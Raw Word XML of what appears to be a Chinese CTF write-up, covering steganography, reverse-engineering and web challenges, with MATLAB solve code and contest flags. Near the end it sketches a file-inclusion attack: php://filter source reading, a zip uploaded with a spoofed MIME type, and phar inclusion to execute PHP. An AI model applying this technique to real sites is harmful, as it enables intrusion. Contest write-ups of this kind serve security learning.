        <w:t>打开题目发现是js逆向，最烦js逆向了T_T，看了看代码然后google之，惊喜地发现居然是原题，SCTF-2016-Q1-obfuscat的原题，去ctftime上找了一篇[writeup](https://github.com/sternze/CTF_writeups/blob/master/sCTF/2016_Q1/obfuscat/readme.md)对着看，题目都差不多，只是有些参数发生了变化。按照题目代码，整个flag被下划线分为4部分第二部分和第三部分很快算出来了分别是iz和y0ur，第四部分算出了中间是3，前后是n和d，这时候灵性来了，前n后d中间会是啥呢，果断是e啊，于是凑出第四部分是neee3eeed??。最后是第一部分，说实话第一部分怎么算的没太看懂(这个队友看懂了但是他不来写WP &gt;_&lt;)，不过看出来跟最后一部分长度有关。在条件都跟原题差不多的情况下，就猜第一部分和原题保持一致，提交flag发现果然是这样(其实我只是随手一试)。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0004519E" w:rsidRPr="00764553" w:rsidRDefault="0004519E" w:rsidP="0004519E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</w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00036147" w:rsidP="0035085D">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc468128528"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">08 </w:t>
      </w:r>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t>你们所知道的隐写就仅此而已吗→_→</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00F9152E" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:spacing w:beforeLines="50" w:before="156" w:beforeAutospacing="0" w:afterLines="50" w:after="156" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
        <w:t>通信小学弟10分钟就做出来了</w:t>
      </w:r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 Hint:为什么不去神奇的频域找找信息呢？ </w:t>
      </w:r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hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="00764553">
          <w:rPr>
            <w:rStyle w:val="af5"/>
            <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>http://139.224.54.27/Shimakaze/shimakaze.bmp</w:t>
        </w:r>
      </w:hyperlink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一开始也是没有什么思路 后来发现了hint是神奇的频域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那就是频域隐写咯 还好这学期学信息隐藏装了matlab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那就傅里叶变换走一发咯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打开matlab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A=imread('shimakaze.bmp','bmp');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subplot(1,3,1),imshow(A);title('原图像');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B=fftshift(fft(A));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subplot(1,3,2),imshow(B);title('傅立叶变换');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生成图片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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7655897C" wp14:editId="4A88402C">
            <wp:extent cx="5274310" cy="2878894"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="7" name="图片 7" descr="E:\programs\qq\390373116\Image\Group\Image1\@O9}P1FQ[GN%DQNOCJB6R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grams\qq\390373116\Image\Group\Image1\@O9}P1FQ[GN%DQNOCJB6R4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讲道理这个不是官方还原方式=</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=但是还是可以看清的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hctf{CoMMuniCatioN}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</w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00036147" w:rsidP="0035085D">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc468128529"/>
      <w:r>
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t>09</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t>gogogo</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00F9152E" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:spacing w:beforeLines="50" w:before="156" w:beforeAutospacing="0" w:afterLines="50" w:after="156" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
        <w:t>上上下下左左右右baba</w:t>
      </w:r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hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="00764553">
          <w:rPr>
            <w:rStyle w:val="af5"/>
            <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>http://139.224.54.27/gogogo/hundouluo.nes</w:t>
        </w:r>
      </w:hyperlink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</w:p>
    <w:p w:rsidR="005351C6" w:rsidRPr="00764553" w:rsidRDefault="005351C6" w:rsidP="00764553">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3457575" cy="2710491"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="32" name="图片 32" descr="E:\programs\qq\390373116\Image\Group\Image1\_Y~U[(SW[RPTE7INV`X8N(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rograms\qq\390373116\Image\Group\Image1\_Y~U[(SW[RPTE7INV`X8N(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706" cy="271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1C6" w:rsidRPr="00764553" w:rsidRDefault="005351C6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  <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>通关就可以，做出来题目的大佬告诉我这是全班同学努力的结果=</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00036147" w:rsidP="0035085D">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc468128530"/>
      <w:r>
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t>0a</w:t>
      </w:r>
      <w:r w:rsidR="00F84102">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t>前年的400分</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00F9152E" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:spacing w:beforeLines="50" w:before="156" w:beforeAutospacing="0" w:afterLines="50" w:after="156" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
        <w:t>熟悉的套路，时代的眼泪</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00F9152E" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:spacing w:beforeLines="50" w:before="156" w:beforeAutospacing="0" w:afterLines="50" w:after="156" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId22" w:history="1">
        <w:r w:rsidRPr="00764553">
          <w:rPr>
            <w:rStyle w:val="af5"/>
            <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          </w:rPr>
          <w:t>附件下载</w:t>
        </w:r>
      </w:hyperlink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M</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>atlab云计算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附代码：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syms p0 p1 p2 p3 p4 p5 p6 p7 p8 p9 p10 p11 p12 p13 p14 p15 p16 p17 p18 p19 p20 p21 p22 p23 p24 p25 p26 p27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syms v1 v2  v3 v4 v5  v6  v7  v8  v9  v10  v11  v12  v13  v14  v15  v16  v17  v18  v19  v20  v21  v22  v23  v24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lastRenderedPageBreak/>
        <w:t>p0 = 751 * v21 - v2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p1 = 757 * v9 + 691 * v13 + 659 * v4 + 1303 * v5 + 1949 * v6 + 3361 * v20 + 3527 * v8 + 4447 * v7 + 5303 * v15 + 5417 * v23 + 5507 * v11 + 6829 * v24 + 7907 * v12 + 8117 * v16 + 9103 * v17 + 8923 * v3 + 9067 * v22 + 9391 * v18 + 9629 * v14 + v2 + 367 * v10 + 89 * v19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p2 = 269 * v11 + 107 * v5 + 67 * v18 + 1213 * v8 + 769 * v13 + 1259 * v4 + 1237 * v14 + 3863 * v20 + 3163 * v19 + 3259 * v10 + 4357 * v23 + 4229 * v7 + 4447 * v21 + 5501 * v15 + 5569 * v22 + 5323 * v12 + 5503 * v24 + 6763 * v16 + 8597 * v6 + 8053 * v17 + 8831 * v9 + 9067 * v3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p3 = 1609 * v13 + 1973 * v5 + 2791 * v10 + 2953 * v18 + 4861 * v11 + 4451 * v22 + 6131 * v20 + 6301 * v9 + 6961 * v7 + 7187 * v23 + 6143 * v17 + 7247 * v19 + 7853 * v21 + 8269 * v6 + 8929 * v8 + 7583 * v16 + 8219 * v14 + 8629 * v24 + 9533 * v3 + 8053 * v12 + 911 * v15 + 23 * v4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p4 = 239 * v8 + 937 * v7 + 389 * v4 + 1487 * v5 + 1039 * v3 + 3461 * v20 + 2897 * v10 + 3583 * v9 + 4229 * v21 + 3307 * v12 + 5987 * v6 + 7177 * v23 + 7459 * v13 + 6959 * v17 + 8893 * v11 + 7949 * v18 + 7643 * v24 + 8521 * v14 + 9769 * v15 + 9137 * v19 + 9059 * v22 + 9689 * v16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p5 = 73 * v7 + 139 * v14 + 919 * v10 + 1613 * v6 + 2053 * v17 + 2207 * v12 + 5077 * v15 + 5387 * v11 + 4421 * v19 + 5717 * v20 + 6337 * v23 + 6211 * v13 + 6271 * v4 + 8243 * v8 + 7211 * v16 + 7159 * v24 + 8779 * v21 + 7853 * v3 + 9013 * v9 + 8443 * v18 + 9371 * v5 + 8971 * v22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lastRenderedPageBreak/>
        <w:t>p6 = 877 * v23 + 797 * v9 + 1613 * v5 + 647 * v16+ 1973 * v6 + 1039 * v24+ 2381 * v13 + 3923 * v7 + 3019 * v3 + 3329 * v18 + 4679 * v14 + 5869 * v15 + 6199 * v19 + 7643 * v11 + 7349 * v20 + 7411 * v17 + 8821 * v8 + 7297 * v12 + 8377 * v4 + 8731 * v22 + 4969 * (v21 + v10)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p7 = 271 * v7 + 227 * v6 + 683 * v20 + 1259 * v11 + 743 * v21 + 1051 * v9 + 991 * v18 + 2473 * v23 + 1361 * v12 + 2621 * v17 + 3673 * v13 + 3089 * v3 + 4679 * v15 + 4519 * v24 + 5701 * v10 + 6079 * v22 + 7159 * v5 + 8161 * v8 + 8311 * v14 + 7877 * v16 + 9859 * v4 + 9949 * v19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p8 = 457 * v20 + 509 * v9 + 2083 * v21 + 2011 * v13 + 1259 * v3 + 1187 * v24 + 2003 * v18 + 4657 * v7 + 3821 * v10 + 4591 * v8 + 4951 * v6 + 4651 * v4 + 4547 * v14 + 4127 * v12 + 4871 * v19 + 5479 * v5 + 4561 * v22 + 6661 * v11 + 6947 * v23 + 7621 * v15+ 5261 * (v16 + v17)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p9 = 241 * v21 + 727 * v20 + 1297 * v7+ 1873 * v15+ 937 * v19+ 499 * v16+ 2003 * v6 + 2381 * v9+ 3769 * v5 + 4283 * v8 + 4099 * v14 + 4483 * v13+ 4703 * v3+ 4799 * v22+ 6361 * v23+ 7057 * v11+ 5897 * v18+ 5531 * v24 + 7583 * v17+ 8429 * v10+ 9629 * v4+ 9371 * v12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p10 = 307 * v8+ 151 * v5+ 17 * v14+ 19 * v22+ 283 * v3+ 2113 * v6+ 2777 * v11+ 853 * v24+ 2411 * v20+ 1543 * v16+ 3559 * v23+ 2897 * v21+ 3851 * v9+ 3529 * v18+ 3833 * v19+ 5591 * v4+ 7229 * v7+ 8563 * v15+ 7757 * v12+ 8243 * v17+ 8831 * v13+ 8963 * v10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p23 = 9467 * v3 - v11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lastRenderedPageBreak/>
        <w:t>p11 = 4001 * v21+ 479 * v12+ 2083 * v6+ 887 * v16+ 2269 * v5+ 2207 * v4+ 2633 * v9+ 3329 * v19+ 3253 * v24+ 5393 * v15+ 4243 * v18+ 5801 * v8+ 7121 * v20+ 6043 * v22+ 6329 * v17+ 7741 * v7+ 8263 * v23+ 7649 * v14+ 9257 * v11+ 9467 * v3+ 349 * v10+ 331 * v13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p12 = 127 * v17+ 1063 * v21+ 1619 * v14+ 2791 * v9+ 3121 * v10+ 2341 * v24+ 4129 * v7+ 4597 * v11+ 5801 * v15+ 4993 * v3+ 6833 * v5+ 7817 * v23+ 6173 * v16+ 7577 * v4+ 8147 * v13+ 8093 * v19+ 8179 * v18+ 9319 * v20+ 9157 * v22+ 8053 * v12+ 661 * v6+ 67 * v8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p13 = 251 * v11+ 887 * v23+ 617 * v6+ 523 * v22+ 2887 * v15+ 1493 * v3+ 2521 * v14+ 2437 * v16+ 3301 * v10+ 4457 * v20+ 4219 * v9+ 3203 * v12+ 3907 * v19+ 5557 * v7+ 5653 * v18+ 8387 * v8+ 8443 * v13+ 7883 * v17+ 9091 * v21+ 8101 * v24+ 9137 * v4+ 9787 * v5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p14 = 1867 * v15+ 683 * v22+ 1187 * v16+ 1801 * v14+ 2251 * v4+ 2347 * v19+ 3019 * v21+ 4153 * v6+ 3541 * v17+ 4813 * v20+ 4999 * v8+ 5669 * v9+ 6869 * v23+ 5527 * v18+ 5051 * v24+ 7949 * v11+ 7019 * v12+ 9067 * v5+ 9343 * v10+ v1+ 113 * v13+ 557 * v7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p15 = 281 * v23+ 467 * v15+ 449 * v8+ 691 * v21+ 443 * v17+ 823 * v19+ 2099 * v9+ 1933 * v12+ 2467 * v22+ 3557 * v5+ 4099 * v6+ 3299 * v16+ 3739 * v18+ 5393 * v11+ 5279 * v7+ 4049 * v24+ 7499 * v20+ 6827 * v14+ 7333 * v3+ 8677 * v4+ 8929 * v10+ 9157 * v13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 xml:space="preserve">p16 = 1063 * v16+ 1187 * v12+ 2551 * v19+ 3187 * v22+ 4943 * v11+ 4651 * </w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>v13+ 5651 * v7+ 6199 * v23+ 6359 * v15+ 7691 * v8+ 7649 * v20+ 7963 * v6+ 7541 * v17+ 7489 * v3+ 7433 * v24+ 8537 * v10+ 9011 * v14+ 9769 * v5+ 9187 * v18+ 4001 * v21+ 947 * v9+ 739 * v4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p17 = 1033 * v13+ 1291 * v9+ 1823 * v8+ 2777 * v15+ 2459 * v6+ 1877 * v19+ 3671 * v11+ 2339 * v24+ 5077 * v21+ 6037 * v23+ 4673 * v12+ 5653 * v3+ 6203 * v17+ 7583 * v20+ 6673 * v18+ 8389 * v14+ 9419 * v5+ 9349 * v4+ 8629 * v16+ 9227 * v22+ 2423 * (v7 + v10)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p18 = 797 * v13 + 1571 * v20 + 1163 * v22 + 3191 * v15 + 1663 * v3 + 3697 * v8 + 3181 * v19 + 3209 * v14 + 3529 * v4 + 3259 * v16 + 4327 * v9 + 4421 * v24 + 5563 * v17 + 5717 * v18 + 6053 * v10 + 6833 * v6 + 7639 * v11 + 6679 * v12 + 9631 * v5 + v2 + 211 * v23 + 17 * v7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p29 = 41 * v7 + 11 * v20 + 1543 * v15 + 1279 * v9 + 2273 * v3 + 2441 * v22 + 4241 * v8  + 4129 * v14 + 4483 * v10 + 4357 * v17 + 6581 * v11 + 5557 * v19 + 6733 * v23 + 5651 * v16 + 7723 * v21 + 6521 * v24 + 7583 * v13 + 8081 * v5 + 6863 * v12 + 9311 * v6+ 9341 * v4 + 9521 * v18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p20 = 43 * v8+ 241 * v4+ 223 * v14+ 1609 * v7+ 2819 * v11+ 1171 * v3+ 2767 * v15+ 3583 * v6+ 3221 * v16+ 4493 * v13+ 3467 * v24+ 3989 * v22+ 6113 * v20+ 5867 * v10+ 5897 * v19+ 6737 * v21+ 5659 * v12+ 6173 * v17+ 6947 * v18+ 9733 * v23+ 9281 * v9+ 9851 * v5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 xml:space="preserve">p21 = 173 * v3 + 83 * v24  + 1723 * v8 + 1213 * v10 + 2731 * v11 + 2099 * v4 + 2657 * v9 + 2953 * v5 + 3329 * v21 + 3169 * v17 + 4987 * v7 + 4637 * v14 + </w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">5003 * v18 + 5407 * v16 + 5843 * v22 + 7243 * v6 + 8017 * v23 + 9203 * v15 + 7507 * v12 + 8681 * v19 + 9721 * v13 + 2 * v20; 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p22 = 127 * v8 + 419 * v21 + 1613 * v13 + 2927 * v7 + 3343 * v15+ 3559 * v20 + 3109 * v4 + 2617 * v16+ 5171 * v11 + 3907 * v12 + 4567 * v14 + 4783 * v10 + 5233 * v9 + 6067 * v23 + 4481 * v24 + 5119 * v3 + 5387 * v17 + 7993 * v6+ 8369 * v5+ 7829 * v19+ 8713 * v18 + 9931 * v22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p24 = v3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p25 = v4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p26 = v5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p27 = v6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[v1, v2, v3, v4, v5, v6, v7, v8, v9, v10, v11, v12, v13, v14, v15, v16, v17, v18, v19, v20, v21, v22, v23, v24]=solve('p1=8653738','p2=7380402','p3=11150160','p4=10134840','p5=10473454','p6=8346096','p7=8281704','p8=7378228','p9=8096388','p10=6861164','p11=8447416','p12=9415156','p13=9611374','p14=8415570','p15=8548212','p16=11348840','p17=9476118','p18=7305322','p19=10517544','p20=8196784','p21=8066952','p22=9011744','p23=0','p0=0','p24=104','p25=99','p26=116','p26=102')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</w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00036147" w:rsidP="0035085D">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc468128531"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>0x</w:t>
      </w:r>
      <w:r>
        <w:t>0b</w:t>
      </w:r>
      <w:r w:rsidR="00F84102">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t>兵者多诡</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidR="00F9152E" w:rsidRPr="00764553">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F9152E" w:rsidRPr="00764553" w:rsidRDefault="00F9152E" w:rsidP="00764553">
      <w:pPr>
        <w:pStyle w:val="af6"/>
        <w:spacing w:beforeLines="50" w:before="156" w:beforeAutospacing="0" w:afterLines="50" w:after="156" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
        </w:rPr>
        <w:t>请尽可能发现更多，不要放过你所看到的</w:t>
      </w:r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hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidRPr="00764553">
          <w:rPr>
            <w:rStyle w:val="af5"/>
            <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>http://pics.hctf.io/home.php?key=hduisa123</w:t>
        </w:r>
      </w:hyperlink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首先</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>存在一处文件包含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http://pics.hctf.io/home.php?fp=xxx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代码</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的逻辑是</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>接收</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>fp</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>参数</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的值然后往</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>后面</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>拼上</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.php，</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>然后包含xxx</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>php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可以</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>用php://filter</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>读</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>源码</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>但是</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>解题并没有太大作用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可以上传一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>zip压缩包</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>需要</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>MIME为image/png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然后</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>phar包含</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>可以</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>执行php</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
        <w:rPr>
          <w:rFonts w:ascii="等线" w:eastAsia="等线" w:hAnsi="等线"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>glob列目录可以发现flag文件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noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11FBB606" wp14:editId="0082AD65">
            <wp:extent cx="5274310" cy="31419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用</w:t>
      </w:r>
      <w:r w:rsidRPr="00764553">
